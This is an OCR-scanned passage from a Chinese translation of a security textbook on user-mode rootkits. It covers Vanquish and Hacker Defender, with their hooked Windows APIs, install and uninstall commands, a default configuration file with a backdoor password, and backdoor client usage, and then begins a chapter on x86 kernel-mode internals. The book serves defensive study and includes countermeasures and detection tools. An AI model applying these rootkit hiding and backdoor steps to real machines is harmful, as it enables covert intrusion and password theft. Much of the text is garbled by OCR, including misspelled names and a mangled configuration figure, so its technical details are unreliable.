: 包含 不 会 引起 任何 当前 的 防 病毒 软件 注意 的 隐身 注入 机 制 。 
- EasyHook32.dll 和 EasyHook64.dll 是 纯粹 的 非 托管 模块 ， 可 以 在 不 安装 任何 .NET framewo 信 的 情况 下 使 用 ! 
- 所 有 钩子 都 很 稳定 地 安装 并 且 自 动 删除 。 


. 采用 完全 未 存在 于 文档 中 的 API 提 供 对 Windows Vista SP1x64 和 Windows Setvet2008SP1x64 的 支持 ， 克 许 挂钩 到 任何 终端 会 
话 中 。 


-你 可 以 为 任何 CPU 编写 注入 程序 库 和 主 进程 ， 这 将 使 你 能 够 在 所 有 情况 下 ， 使 用 非常 相同 的 汇编 程序 从 64 位 和 32 位 进程 中 
注入 代码 到 32 位 和 64 位 进程 。 


如 果 你 需要 挂钩 或 者 希望 学 习 用 户 模式 中 正确 编写 钩子 的 细节 ， 一 定 要 查看 EasyHook 网 站 。 


3.3 ”用 户 模式 Rootkit 实 例 


过 去 的 10 年 内 发 现 和 分 析 了 许多 常见 的 Rootkit， 但 是 两 个 “经 典 ” 的 例子 十 分 引 人 注 目 。 下 面 的 举例 将 提供 用 户 模式 
Rootkit 工 作 的 详细 背景 ，Rootkit 与 WinAPI 的 关系 ， 以 及 与 相关 的 木马 的 关系 。 


SU 
@” 


Vanquish 


流行 性 





Vanduish 是 一 个 围绕 DLL 注入 技术 设计 ， 用 于 隐藏 文件 、 文 件 夹 和 注册 表 项 的 Rootkit， 它 还 包含 记录 密码 的 能 力 。 本 书 使 
用 的 版 本 是 Vanquish v0.2.1， 因 为 它 随处 可 见 ， 我 们 从 来 没有 发 现 它 的 问题 ， 通 过 Google 上 的 快速 搜索 可 以 得 到 一 个 代码 副 
本 。 但 是 要 记 住 两 件 事情 : 1) 防 病毒 软件 可 能 发 现 这 个 软件 包 并 且 试 图 隔离 或 者 删除 它 。2) 它 被 设计 为 使 用 管理 员 特 权 运 


行 。 

Vanduish 可 以 在 Windows2000、XP 和 2003 的 32 位 版 本 中 运行 。 在 Windows 新 版 本 (如 Windows7 和 Windows10) E, 
它 可 能 会 出 现 错误 或 者 完全 失败 ， 但 是 我 们 还 没有 在 这 些 新 环境 中 测试 过 。 
组 件 


这 个 软件 包 包含 如 下 文件 和 预期 功能 。.zip 包 包含 Vanduish 文 件 夹 和 bin 目 录 。 软 件 包 的 组 件 详 见 表 3-3 和 表 3-4。 
表 3-3 ”Vanquish 安 装 文件 描述 


组 件 描述 
readme.txt 解释 软件 功能 、 特 性 和 组 件 的 帮助 文件 
setup.cmd 是 用 于 将 Rootkit 装 入 系统 的 安装 程序 封装 批文 件 。 运 行 时 ， 它 将 执行 Vanquish 并 且 


she 调用 installer.cmd 

installer.cmd Installer.cmd 将 以 下 模式 之 一 进行 安装 : 安装、 修复 、 重 新 安装 、 删 除 、 删 除 旧 安装 
vanquish.exe 这 是 Vanquish 的 注入 程序 

vanquish.dll Vanquish.dll 包含 将 被 注入 到 操作 系统 的 所 有 DLL 子 模块 


Vanquish DLL 


vanquish.dll 包 含 了 在 DLL 注 入 进程 后 执行 各 种 功能 的 子 模块 。 表 3-4 提 供 了 这 些 子 模块 的 信息 ， 它 们 所 提供 给 vanquish 
Rootkit 的 特性 ， 以 及 所 影响 的 Windows 服 务 功能 。 


将 它们 放 到 一 起 ， 你 会 得 到 .… 


每 次 的 DLL 注入 都 为 Rootkit 提 供 一 个 独特 的 服务 ， 因 为 它们 都 挂钩 一 个 独立 的 API 并 且 创 建新 的 进程 。Vanquish 早 期 版 本 
(pre0.1~ beta9) 中 的 DLL 注入 使 用 CreateRemoteThread 注 入 技术 。 这 种 技术 进行 了 修改 ， 以 便 消 除 偶然 发 生 的 、 进 程 在 挂 
钩 之 前 就 已 完成 的 情况 ， 这 在 前 面 已 经 讨论 过 。 挂 钩 的 DLL 可 见 对 于 用 户 有 什么 好 处 呢 ? 所 以 ， 我 们 将 要 使 用 的 版 本 (v0.2.1) 
采用 本 章 前 面 描述 过 的 高 级 DLL 注入 。 


表 3-4 vanquish.dll 子 模块 、 功 能 描述 以 及 受 影响 的 服务 功能 


wa TER AP 


将 Vanquish DLL 注入 新 的 进程 中 。 


DllUtils oe ie, pis has apc hs . (CreateProcess(AsUser)A/W) (FreeLibrary) 
确定 没有 别 的 程序 会 印 载 Vanquish DLL ( y 
as 隐藏 包含 魔法 字符 串 “ vanquish” fy ee 
HideFiles E S (FindFirstFileExW, FindNextFileW) 
文件 /文件 夹 
HideR (RegCloseKey, RegEnumKeyA/W, RegEnumKeyExA/W, 
ideRe 
RegEnumValueA/W, RegQueryMultipleValuesA/W) 
HideServices (EnumServicesStatusA/W) 


PwdLog 记录 用 户 、 密 码 和 域 (LogonUserA/W, WlxLoggedOutSAS) 
(DeleteFileA/W, RemoveDirectoryA/W) (SetLocalTime, 


SetTimeZoneInformation, SetSystemTimeAdjustment, 


阻止 删除 以 DAMY 开头 的 文件 /文件 
夹 。 阻 止 修改 系统 时 间 


SourceProtect 





SetSystemTime) 


Vanduish 通 过 运行 setup.cmd 批 文件 安装 到 目标 机 器 上 。 这 个 批文 件 从 installercmd 脚 本 开始 ， 这 个 脚本 会 检查 以 前 的 
Vanquish 安 装 并 且 进 行 Rootkit 安 装 。 安 装 程序 调用 vanquish.exe 借 助 谋 入 遂 数 钩子 进行 vanquish.dll 的 高 级 DLL 注 入 。 


Ə Vanquish 对 策 


对 于 用 户 模式 的 Rootkit， 有 两 种 与 有 效 的 对 策 相关 的 基本 思路 。 首 先是 预防 性 的 高 效率 计算 机 安全 实践 ， 其 次 是 积极 地 使 
用 最 近 几 年 流行 起 来 的 大 量 Rootkit 检 测 工具 。Vanquish 大 约 是 最 容易 防御 的 Rootkit， 因 为 它 的 源 代码 已 经 可 以 获得 ， 并 且 不 
要 求 任何 高 级 的 隐蔽 性 ， 考 虑 到 审慎 的 网 络 安全 防御 ， 你 受到 Rootkit 侵 害 的 可 能 性 较 低 。 


计算 机 安全 实践 


在 不 知 不 党 中 拥有 一 个 Rootkit 的 主要 原因 是 系统 泄密 ， 这 一 点 也 不 令 人 惊 证。 虽然 在 过 去 的 30 年 中 防 病毒 技术 已 经 有 了 发 
展 ， 防 火 墙 、 入 侵 检 测 和 防御 系统 、 网 络 访问 控制 和 Web 监 控 的 极 大 进步 也 已 改变 了 企业 安全 态势 。 但 是 ， 尽 管 有 大 量 的 工具 
和 技术 ， 受 到 侵害 的 系统 仍然 不 断 增加 ， 而 进行 彻底 的 计算 机 安全 实践 很 可 能 减少 这 种 侵害 。 如 果 用 户 和 安全 管理 员 不 遵循 正确 
的 程序 或 者 公司 策略 绕 过 安全 控制 ， 那 么 世界 上 最 好 的 技术 也 没有 任何 价值 。 


Rootkit 可 以 从 几 个 不 同 的 攻击 方向 轻松 地 放置 到 系统 上 ， 比 如 通过 蠕虫 、P2P 或 者 木马 ， 所 以 使 用 端口 阻塞 、 防 火 墙 和 
Web 监 控 作 为 预防 性 策略 ， 有 可 能 节省 很 多 删除 和 重建 受 感染 机 器 的 时 间 。 强 密码 策略 的 实施 、 减 少 组 和 共享 账户 以 及 对 社会 
工程 的 警惕 性 也 很 有 助 于 减少 被 恶意 软件 远程 侵入 的 机 器 的 数量 。 


Rootkit 检 测 


有 多 种 Rootkit 检 测 工具 可 以 用 于 检测 和 删除 不 同类 型 的 Rootkit， 所 有 工具 都 能 检测 Vanquish。 最 常用 的 Rootkit 工 具 在 表 


3-5 中 列 出 。 


工具 


F-Secure BlackLight 


IceSword 


RootkitRevealer 


其 他 工具 


NIZ 
@” 


Hacker Defender 


表 3-5 建议 使 用 的 用 户 模式 Rootkit 检 测 软 件 


描述 

F-Secure 的 BlackLight 技术 提供 了 对 Rootkit 的 检测 和 大 部 分 常见 Rootkit 类 型 的 清除 。 
这 个 工具 包含 在 F-Secure Internet Security 2007 和 2008 中 ， 并 且 有 可 用 的 在 线 扫描 程序 
( http://support.f-secure.com/enu/home/ols.shtml) o žk 97. AY WRAS FY MA F-Secure 安全 中 心 下 载 
(ftp://ftp. f-secure.com/anti-virus/tools/fsbl.exe ) 

这 个 工具 由 pf 开发， 用 于 检测 、 禁 用 和 删除 Rootkit. IceSword 将 检测 隐藏 的 自 启动 、 
文件 和 文件 夹 、 进 程 和 服务 、 注 册 表 项 目 、 浏 览 器 助手 对 象 (BHO) 以 及 Windows 消息 
钩子 。 可 用 的 下 载 为 中 文 版 ， 可 在 http://www. xfocus.net/ tools/ 200505/1032.html 上 获得 

RookitRevealer 程序 由 SysInternals 的 Mark Russinovich 开发 。 这 个 高 级 Rootkit 检测 软 
件 识别 API 的 变化 并 且 有 扫描 系统 注册 表 的 选项 。 虽 然 Microsoft 停止 开发 ， 但 是 它 仍 是 
一 个 很 好 的 工具 。 可 以 从 http://download.cnet.com/RootkitRevealer/3000-2248 4-10543918. 
html 下 载 它 。 

还 有 许多 其 他 工具 可 以 用 来 识别 Rootkit。 我 们 只 能 证 实 前 面 那些 工具 有 效 ， 因 为 我 们 
已 经 成 功 地 使 用 过 它们 。 下 面 是 提供 Rootkit 检测 功能 的 其 他 工具 的 列表 : 

一 一 Microsoft Windows Malicious Removal Tool 

一 一 North Security Labs Hypersight Rootkit Detector 

一 一 Sophos Anti-Rootkit Tool 

一 一 Trend Micro RootkitBuster 

一 一 McAfee Rootkit Detective 


IA L 
流行 性 





Hacker Defender 缩 写 为 HXxDef， 可 能 是 最 具 标志 性 的 Rootkit。 它 由 Holy Father 和 Ratter/29A 开 发 和 发 行 ， 为 Windows 
NT/2000/XP 而 设计 。HxDef 是 一 个 高 度 可 定制 的 Rootkit， 包 含 一 个 配置 文件 、 一 个 后 门 和 一 个 重 定向 程序 。 这 些 工具 构成 了 
一 个 极其 强大 的 Rootkit。 这 个 程序 的 概念 是 挂钩 关键 的 Windows API， 以 便 控制 单独 的 函数 。 一 旦 这 些 函 数 得 到 控 
制 ，Rootkit 就 能 够 处 理 一 些 API 数 据 调用 。 在 这 个 过 程 中 ， 可 以 处 理 和 隐藏 配置 的 任何 文件 、 服 务 、 驱 动 程序 或 者 注册 表 键 
值 ， 使 HxDef 成 为 几乎 不 可 见 的 Rootkit。 


尽管 HxDef 和 所 有 Rootkit 一 样 都 是 可 探测 的 ， 但 是 它 已 经 花费 了 许多 事故 处 理 人 员 、 系 统管 理 员 和 取证 调查 人 员 的 金钱 。 
在 我 们 快速 地 进入 这 个 程序 的 特性 和 功能 时 ， 请 注意 我 们 所 用 的 是 HxDef 和 的 100r 版 本 。 


用 户 可 以 选择 使 HxDef 作 为 一 个 服务 安装 和 运行 ， 也 可 以 单独 运行 (不 作为 服务 ) 。 作 为 服务 运行 使 Rootkit 可 以 在 系统 重 
启 之 后 继续 执行 。HxDef 也 可 以 重新 装 入 .ini 文 件 来 更 新 程序 配置 ， 当 然 也 可 以 印 载 。 使 用 默认 的 .ini 文 件 时 需要 注意 的 一 点 是 ， 
在 你 安装 这 个 程序 之 后 ， 所 有 HxDef 文 件 将 会 消失 ， 因 为 这 是 Rootkit 的 一 个 功能 。 为 了 卸载 Rootkit， 你 必须 知道 它 的 安装 目 
录 ， 所 以 一 定 要 记录 文档 。 


可 以 使 用 如 下 的 语法 从 系统 中 删除 HackerDefender: 


>hxdef100.exe -:uninstall 


卸载 后 ， 用 户 将 不 能 找到 任何 HxDef100 程 序 文件 的 实例 。 


下 面 是 来 自 hxdef100r 目 录 的 安装 样 例 : 


C:\hxdef100r>dir 


10/10/2008 10:28 AM <DIR> 
10/10/2008 10:28 AM <DIR> e 
07/20/2005 07:09 PM 26,624 bdclil00.exe 
09/01/2005 11:13 AM 70,656 hxdef-OFdis.exe 
07/20/2005 01:40 PM 3,924 hxdef100.2.ini 
09/01/2005 11:38 AM 70,656 hxdef100.exe 
07/29/2005 11:18 AM 4,119 hxdef100.ini 
07/20/2005 07:09 PM 49,152 rdrbs100.exe 
09/18/2005 06:57 PM 37,407 readmecz.txt 
09/18/2005 06:56 PM 37,905 readmeen.txt 
09/01/2005 11:23 AM 93,679 src.zip 

9 File(s) 394,122 bytes 


2 Dir(s) 42,495,737,856 bytes free 
接着 ， 你 运行 安装 程序 来 安装 这 个 应 用 : 
C:\hxdef100r>hxdef100.exe 


现在 所 有 HxDef (hxdef*) 文件 从 系统 控制 台 或 者 Windows 中 都 不 再 能 看 到 : 


Cc: \hxdef100r>dir 


10/10/2008 10:28 AM <DIR> 
10/10/2008 10:28 AM <DIR> es 
07/20/2005 07:09 PM 26,624 bdclil00.exe 
07/20/2005 07:09 PM 49,152 rdrbs100.exe 
09/18/2005 06:57 PM 37,407 readmecz.txt 
09/18/2005 06:56 PM 37,905 readmeen.txt 
09/01/2005 11:23 AM 93,679 src.zip 

5 File(s) 244,767 bytes 

2 Dir(s) 0 bytes free 


注意 列表 中 的 0 字 节 ， 这 说 明 HxDef 拷 贝 不 再 存在 。 


配置 文件 包含 多 个 可 以 定制 的 列表 ， 这 样 Rootkit 可 以 提供 最 高 级 的 服务 。HxDef 可 以 不 修改 任何 配置 就 运行 ; 但 是 ， 如 果 
进行 了 修改 ， 很 重要 的 一 点 是 即使 列表 没有 内 容 ， 也 必须 有 标题 。 每 个 配置 文件 列表 都 提供 很 好 的 Rootkit 功 能 。 


表 3-6 描 述 了 所 有 配置 文件 列表 和 可 接受 的 参数 。 图 3-2 是 预先 配置 的 hxdef100.ini 本 置 文件 样 例 。 列 表 标题 和 默认 值 已 经 处 
理 过 (列表 标题 在 括号 内 ) ， 使 得 搜索 hxdef 或 者 Hidden Processes 这 样 的 关键 词 极其 困难 。 


表 3-6 hxdef100.ini 文 件 列表 和 可 接受 的 格式 


配置 文件 列表 


[Hidden Table] 


[Hidden Processes] 
[Root Processes] 
[Hidden Services] 


[Hidden RegKeys] 
[Hidden Reg Values] 


[Startup Run] 


[Free Space] 


[Hidden Ports] 


[Settings] 


在 钩 的 AP1 进 程 


描述 和 可 接受 参数 

这 是 必需 的 列表 ,包含 需要 隐藏 的 所 有 文件 、 目 录 和 进程 。 这 个 列表 中 的 所 有 项 目 都 将 
在 Windows 文件 和 任务 管理 需 中 被 隐藏 。 文 件 名 字符 串 中 可 以 接受 通配符 (例如 *) 

这 是 必需 的 列表 ， 包含 可 以 看 到 隐藏 文件 、 目 录 和 进程 的 程序 。 文 件 名 字符 串 中 可 以 接 
受 通 配 符 (例如 *) 

这 是 必需 的 列表 ,包含 要 隐藏 的 程序 。 进 程 名 字符 串 中 可 以 接受 通配符 (例如 *) 

这 包含 一 个 需要 隐藏 的 所 有 服务 和 驱动 程序 名 称 的 列表 。 服 务 名 字符 串 中 可 以 接受 通 配 
符 (例如 *) 

将 被 完全 隐藏 的 注册 表 键 的 列表 。 注 册 表 项 名 字符 串 中 可 以 接受 通配符 (例如 *) 

将 被 隐藏 的 注册 表 值 的 完整 列表 

特别 列 出 Rootkit 设置 之 后 运行 的 程序 和 参数 。 可 能 包含 如 下 的 简写 : %cmd%， 
%emddir%, %sysdir%, Ywindir%, 和 %tmpdir% 

硬盘 和 添加 到 空闲 空间 的 字 节 数列 表 。 格 式 为 : X:NUM，X= 驱动 名 号 ，NUM=# 或 者 添 
加 的 空闲 字 节 数 

需要 隐藏 的 所 有 开放 端口 的 列表 ， 列 表 包 括 3 行 。 这 个 配置 段 可 以 为 空白 : 

TCPI:portl,port2,port3,... 

TCPO:portl ,port2,port3,... 

UDP:port1,port2,port3.... 

基本 设置 ， 必 须 包 含 如 下 项 目 : 

一 一 Password: 用 于 后 门 和 重 定向 程序 访问 的 长 度 为 16 的 字符 串 

一 一 BackdoorShell: 后 门 创建 于 临时 目录 的 文件 名 称 

一 一 FileMappingName: 挂钩 进程 设置 使 用 的 共享 内 存 名 称 

一 一 ServiceName: 服务 名 称 

一 一 ServiceDisplayName: 服务 显示 名 称 

一 一 ServiceDescription: Rootkit 服务 描述 

一 一 DriverName: HxDef 驱动 程序 名 

——DriverFileName: HxDef 驱动 程序 文件 名 


下 列 API 进 程 在 Rootkit 安 装 时 挂钩 。HxDef 通 过 函数 钩子 ， 从 NtDll.dll 执 行 NtEnum-erate-Key API 的 内 存 中 DLL 注 入 : 


Kernel32.ReadFile 
Ntdl1l.NtQuerySystemInformation 
Ntdl1l.NtQueryDirectoryFile 
Ntdl1l.NtVdmControl 
Ntd1ll.NtResumeThread 
Ntdl1l.NtEnumerateKey 
Ntd1ll.NtEnumerateValueKey 
Ntdl1l.NtReadVirtualMemory 
Ntdll1.NtQueryVolumeInformationFile 
Ntdl1l.NtDevicelIoControlFile 
Ntd1ll.NtLdrLoadD11l 
Ntdll.NtOpenProcess 
Ntdll.NtCreateFile 
Ntdl1l.NtLdriInitializeThunk 
WS2_32.recv 

WS2_32.WSARecv 
Advapi32.EnumServiceGroupW 
Advapi32.EnumServicesStatusExw 
Advapi32.EnumServicesStatusExA 
Advapi32.EnumServicesStatusA 


I hxdef100.ini - Notepad ( fe} 
File Edit Format View Help 


[H<<<idden T>>a/"ble] 
>h"xdef"* 
r|c<md\. ex<e:: 


[\<Hi<>dden" P/r>ooc"/e<ss>es\\] 
>h"xdef"* 
rcm"d.e"xe 


"[:\:R:O:O\:t: :P:r>:0:C<:e:S:S:e<:S:>] 
h<x>d<e>:f<* 


<\r\c:\m\d. \e\x\e 


A/[/H/idd\en Ser:vi"ces] 
Ha>:ck"er //Def\ ender * 


f 
[Hi:dden R/">>egKeys] 
Ha: "c<kerDef\e/nder1o0o 
LE" :GACY_H\ACK/ERDEFE\ND: ERLOO 
Ha: "c<kerDef\e/nderDrv100 
LE" :GACY_H\ACK/ERDEFE\ND: ERDRVLOO 
\"[Hid:den\> :Reqvalues]""" 
:(st/\artup\, Run/] 
":[\Fr<ee>> S:"<pa>ce] 


"[>H<i>d"dien<>\ P/ior:t<s"J]\: 
TCPI: 


[set/tin/:\gs] f 


P:assw\ord=hxdef-rulez 
Ba:ckd:"oor"shell=hxdefß$. exe 
Fil:emappin\gn/ames_.-=[Hacker Defender]=-._ 
Serv:iceName=HackerDefender100 
>Se|rvi:ceDisp<://la"yName=HXD Service 100 
Ser>vic:eD| |escr<ip:t ‘ion=powerful NT rootkit 
Dri<ve\rN:ame=Hacker Defender Drv1L00 

D:riv>erFi lenam/e=hxdefdrv. sys 





图 3-2 ”预先 配置 的 hxdef100.ini 配 置 文件 样 例 
后 门 


HxDef 程 序 中 包含 了 一 个 基本 的 后 门 程序 。 这 个 Rootkit 挂 钧 了 多 个 通过 网 络 服务 接收 封包 的 API 函 数 。 当 入 站 数据 请 求 封包 
等 于 一 个 预先 定义 的 256 位 键 值 ， 后 门将 会 验证 这 个 键 值 和 服务 。 完 成 验证 后 ， 根 据 hxdef100.ini 中 [Settings] 下 的 设置 创建 一 个 
命令 shell， 一 般 为 cmd.exe。 除 了 未 挂钩 的 系统 服务 之 外 ， 服 务 器 上 所 有 开放 的 端口 接收 到 的 数据 都 将 被 重 定向 到 这 个 shell。 


程序 bdcli100.exe 是 用 于 连接 这 个 后 门 的 客户 端 : 


Usage: bdclil00.exe host port password 


Ə HxDef 对 策 


HxDef 很 难 发 现 并 从 受到 侵害 的 机 器 上 清除 。HxDef 的 常见 版 本 可 以 通过 lIcdSword 查 看 端口 屏幕 发 现 。 其 他 Rootkit 检 测 工 
具 不 是 总 能 成 功 地 发 现 这 个 Rootkit 所 挂钩 的 APl。 几 年 以 前 ，holy_father 提 供 了 HxDef 代 码 的 修改 版 本 ， 这 个 版 本 用 于 销售 并 
且 命 名 为 Silver and Gold ( 金 银 ) 。 这 些 收 费 的 版 本 包含 了 代码 和 对 需要 更 好 的 隐蔽 性 或 者 绕 开 防 病毒 软件 等 特殊 情况 下 的 定 
制 修改 的 支持 。 这 些 版 本 还 没有 被 广泛 发 现 ， 所 以 检测 就 更 困难 。 在 编写 本 书 时 所 考察 的 一 个 副本 是 由 Icesword 检 测 出 来 的 。 


34 小 结 

本 章 提供 了 Rootkit 的 一 个 总 体 介绍 ， 以 及 多 个 Rootkit 赖 以 操纵 计算 机 系统 的 计算 机 术语 和 功能 。 我 们 介绍 了 Rootkit 的 主 
要 特征 : 

* 维持 访问 权 

通过 隐身 掩盖 存在 

我 们 还 介绍 了 Rootkit 的 类 型 : 

:用户 模式 Rootkit 

.内核 模式 Rootkit 


在 本 章 中 ， 我 们 更 关注 用 户 模式 Rootkit。 本 章 介 绍 的 第 一 类 Rootkit 展 示 了 用 户 模式 Rootkit 如 何在 用 户 空间 中 发 挥 作 用 ， 
以 及 如 何 使 用 DLL 注入 和 进程 钩子 来 接管 系统 。 虽 然 用 户 模式 Rootkit 不 是 最 复杂 或 者 最 有 破坏 力 的 ， 但 是 对 用 户 的 影响 仍然 很 
严重 。 因 为 Rootkit 开 发 人 员 必 须 确保 他 们 的 Rootkit 在 被 攻击 的 机 器 上 停留 更 久 并 且 过 滤 所 有 类 型 的 进程 (包括 系统 进程 ) ， 他 
们 开始 关注 于 使 用 内 核 模 式 Rootkit 来 实现 用 户 模式 Rootkit 的 功能 。 这 些 内 核 模式 Rootkit 在 恶意 软件 隐蔽 性 上 更 加 高 效 ， 也 更 
加 难以 发 现 。 在 第 4 章 ， 你 将 学 习 更 多 关于 内 核 Rootkit 的 知识 。 


第 4 章 ”内 核 模式 Rootkit 


内 核 模式 Rootkit 可 能 是 最 广泛 应 用 的 Rootkit， 对 当今 的 计算 机 表现 出 最 明显 的 威胁 。 在 2007 年 摧毁 了 数 十 万 台 机 器 的 
stormWorm 就 具备 了 一 个 内 核 模式 Rootkit 组 件 (参见 http://recon.cx/2008/a/pierre-marc bureau/storm-recon.pdf) 。 这 
个 组 件 使 蠕虫 能 够 进行 更 多 的 破坏 ， 并 在 非常 深 的 程度 上 (操作 系统 级 别 ) 感染 系统 。 


因此 ， 我 们 将 花费 相当 多 的 篇 幅 来 讨论 Windows 操 作 系统 的 内 部 结构 。 内 核 模 式 也 就 是 和 操作 系统 在 同一 个 级 别 ， 因 此 内 
核 模式 Rootkit 必 须 理解 如 何 使 用 和 其 他 内 核 模式 组 件 (例如 驱动 程序 ) 和 操作 系统 相同 的 函数 、 结 构 和 技术 。 为 了 真正 地 体会 
到 这 种 交互 并 且 理 解 内 核 模式 Rootkit 带 来 的 威胁 ， 你 也 必须 理解 这 些 OS 级 别 的 细节 。 但 是 复杂 性 并 不 是 以 操作 系统 作为 起 点 和 
终点 的 ， 正 如 你 在 本 章 中 所 学 习 到 的 ,许多 内 核 模 式 技术 依赖 于 复杂 的 底层 硬件 。 结 果 是 ， 你 的 PC 由 一 个 分 层 的 技术 系统 组 
成 ， 这 些 层次 必须 进行 交互 并 且 共 存 于 系统 之 中 。 这 个 分 层 系 统 的 主要 组 件 包括 处 理 器 及 其 指令 集 、 操 作 系统 和 软件 。 


因为 内 核 模 式 Rootkit 在 操作 系统 级 别 上 感染 系统 ， 并 且 依 赖 于 与 硬件 的 低级 交互 ， 我 们 也 将 讨论 大 部 分 PC 中 控制 硬件 的 部 


件 一 一 x86 体 系 结构 。 尽 管 本 章 仪 关注 x86 和 Windows， 但 是 干 万 不 要 以 为 其 他 指令 集 和 操作 系统 没有 相同 的 问题 。 内 核 模 式 
Rootkit 技 术 也 存在 于 Linux 和 OS X 中 。 我 们 关注 x86 和 Windows 只 是 因为 目前 它们 的 数量 最 大 ， 受 到 的 破坏 也 最 多 。 
本 章 的 流程 如 下 : 

- 对 x86 体 系 结构 基础 知识 的 全 面 讨论 。 

- 详细 的 Windows 内 部 结构 介绍 。 

` Windows 内 核 驱动 程序 概念 及 工作 方式 的 概述 。 

内 核 模 式 Rootkit 的 挑战 、 目 标 和 策略 。 

> 内 核 模 式 Rootkit 的 方法 和 技术 摘要 及 实例 。 


如 果 你 是 x86/Windows 专 家 ， 可 以 跳 到 4.3 节 。 


4.1 底层 : x86 体 系 结构 基础 


本 节 将 向 读者 介绍 为 了 了 解 高 级 的 内 核 模式 Rootkit 所 必须 具备 的 x86 体 系 结构 基础 知识 。 指 令 集体 系 结构 影响 从 硬件 (如 
芯片 设计 ) 到 软件 (例如 操作 系统 ) 的 所 有 环节 ， 对 整体 系统 安全 和 稳定 性 的 影响 也 从 这 个 低 的 级 别 开 始 。 


4.1.1 ”指令 集体 系 结构 和 操作 系统 


x86 是 个 人 计算 机 上 许多 处 理 器 品牌 使 用 的 一 种 指令 集体 系 结构 。 指 令 集 是 一 组 命令 ， 告 诉 操作 系统 执行 哪些 操作 来 完成 一 
个 任务 。 你 可 能 没有 意识 到 ， 每 天 你 都 在 使 用 指令 集 ， 不 管 你 拥有 的 是 一 台 Mac、 一 台 PC 还 是 一 部 手机 。 在 这 个 结构 层次 ， 你 
的 处 理 器 理解 有 限 的 命令 集 ， 这 些 命令 代表 数学 运算 (加 、 乘 、 除 ) 、 控 制 流 结构 (循环 、 跳 转 、 条 件 分 支 ) 、 数 据 操 作 ( 移 
动 、 存 储 、 读 取 ) 以 及 其 他 基本 功能 。 这 种 最 小 化 的 功能 集 是 有 意 为 之 ， 因 为 处 理 器 每 秒 可 以 计算 数 百 万 条 指令 ， 这 些 指令 的 组 
合 能 够 形成 复杂 的 任务 ， 例 如 ， 进 行 一 个 视频 游戏 或 者 在 遗传 学 软件 中 整合 蛋白 质 。 将 这 些 高 级 任务 翻译 成 CPU 所 用 的 简单 指 
令 和 数据 、 并 且 显 示 在 你 的 屏幕 上 的 技术 复杂 度 非常 大 。 


操作 系统 在 这 种 场合 下 充当 了 救星 。 在 这 个 例子 中 ， OS 承担 了 将 复杂 任务 分 解 成 简单 的 x86 指 令 的 复杂 工作 。OS 负 责 协 
调 、 同 步 、 保 全 和 引导 执行 任务 所 必需 的 所 有 组 件 。 这 些 组 件 包 括 处 理 与 字符 对 应 的 电子 信号 的 低级 键盘 驱动 程序 、 将 内 容 / 数 
据 保存 到 物理 驱动 器 的 一 系列 中 级 文件 系统 驱动 程序 和 低级 磁盘 驱动 程序 ， 还 有 许多 处 理 MO (输入 / 输出 ， 如 读 取 和 写 入 存储 
媒体 ) 、 访 问 权限 、 图 形 显示 和 字符 编码 及 转换 的 Windows 子 系统 。 


CPU 提 供 的 指令 集 为 操作 系统 揭示 了 使 用 计算 机 中 的 硬件 所 需要 的 机 制 。 这 些 机 制 包括 物理 内 存 (RAM) 分 段 和 编 址 方式 
(操作 系统 引用 内 存 位 置 的 方法 ) ; 用 于 基本 运算 和 处 理 器 间 快 速 读 取 变 量 的 存储 的 物理 CPU 寄 存 器 ; 随 着 系统 总 线 完 度 增加 
到 64 位 而 扩展 的 操作 模式 ; 用 于 游戏 和 高 端 图 形 的 扩展 (MMX，3dNow 等 ) 以 及 使 带 有 32 位 总 线 宽度 的 系统 能 够 读 取 和 翻译 
64 位 地 址 的 物理 地 址 扩展 (PAE) ; 虚拟 化 支持 ; 还 有 最 重要 的 ， 用 于 访问 特权 功能 和 资源 的 硬件 强制 保护 层次 。 这 些 保护 层次 
使 操作 系统 通过 将 最 高 特权 级 别 的 访问 限制 在 操作 系统 中 来 保持 对 系统 上 应 用 程序 权限 的 控制 。 我 们 先 来 仔细 地 看 看 这 个 保护 层 

次 的 概念 。 


4.1.2 ”保护 层次 


在 x86 体 系 结构 中 ， 保 护 层 次 (0~ 3) 是 CPU (由 OS 实现 ) 在 执行 代码 时 实施 的 特权 级 别 ( 见 图 4-1) 。 


因为 从 操作 系统 过 程 到 用 户 应 用 程序 的 所 有 二 进 制 代码 ， 都 在 相同 的 处 理 器 上 运行 ， 所 以 必须 有 一 个 机 制 来 区 分 系统 代码 和 
用 户 代码 ， 并 相应 地 限制 特权 。OS 在 最 高 特权 级 别 上 运行 ， 也 就 是 Ring0 (也 称 为 内 核 模式 或 者 内 核 空间 ) ， 而 用 户 程序 和 应 
用 程序 运行 于 最 低 的 特权 级 别 Ring3 ( 称 为 用 户 模式 或 者 用 户 空间 ) 。 


较 噩 的 
CPU 
特权 级 





图 4-1 保护 层次 


在 硬件 和 OS 中 如 何 实施 这 种 保护 的 细节 以 及 许多 x86 提 供 但 未 被 Windows 使 用 的 其 他 层次 和 操作 模式 都 很 复杂 ， 在 这 里 就 
不 做 进一步 研究 。 现 在 所 要 理解 的 重要 概念 是 CPU 和 OS 合作 实现 保护 层次 ,这些 层次 的 存在 只 是 为 了 维护 安全 和 系统 完整 性 。 
举 个 简单 的 例子 ， 你 可 以 将 保护 层次 看 作 CPU 标 志 中 的 一 个 位 值 ， 被 设置 时 表示 代码 具有 Ring0 (OS 代码 ) 特权 ， 未 被 设置 时 
表示 Ring3 (用 户 代码 ) 特权 。 补 充 说 明 一 点 ， 这 个 领域 的 研究 正在 焕发 生机 ， 层 次 保护 的 概念 对 于 理解 特权 分 离 的 难度 变 得 非 
常 天 键 。 虚 拟 化 技术 在 过 去 的 几 年 急剧 流行 起 来 ， 因 为 芯片 制造 商 争 着 将 业界 带 向 对 虚拟 化 操作 系统 的 硬件 支持 的 方向 上 来 。 结 
果 是 ， 一 些 指令 集中 加 入 了 一 个 新 的 保护 层次 ， 就 是 Ring-1， 这 个 层次 使 系统 管理 程序 (在 大 部 分 情况 下 是 一 个 灵活 的 最 小 化 
宿主 OS) 能 够 监控 运行 于 Ring0 的 客户 操作 系统 ， 而 不 是 让 客户 操作 系统 运行 于 “真正 的 Ring0” (因此 客户 操作 系统 不 能 使 用 
真正 的 硬件 ， 而 是 虚拟 化 的 硬件 ) 。 这 些 新 的 概念 也 导致 Rootkit 技 术 的 显著 进步 ， 产 生 了 虚拟 化 的 Rootkit， 这 是 第 5 章 的 主 


题 。 


4.1.3 ”跨越 层次 


保护 层次 的 关键 特性 是 可 以 使 CPU 根 据 执行 中 的 代码 的 需要 改变 特权 级 别 ， 这 使 较 低 特 权 的 应 用 程序 能 够 执行 较 高 特权 级 
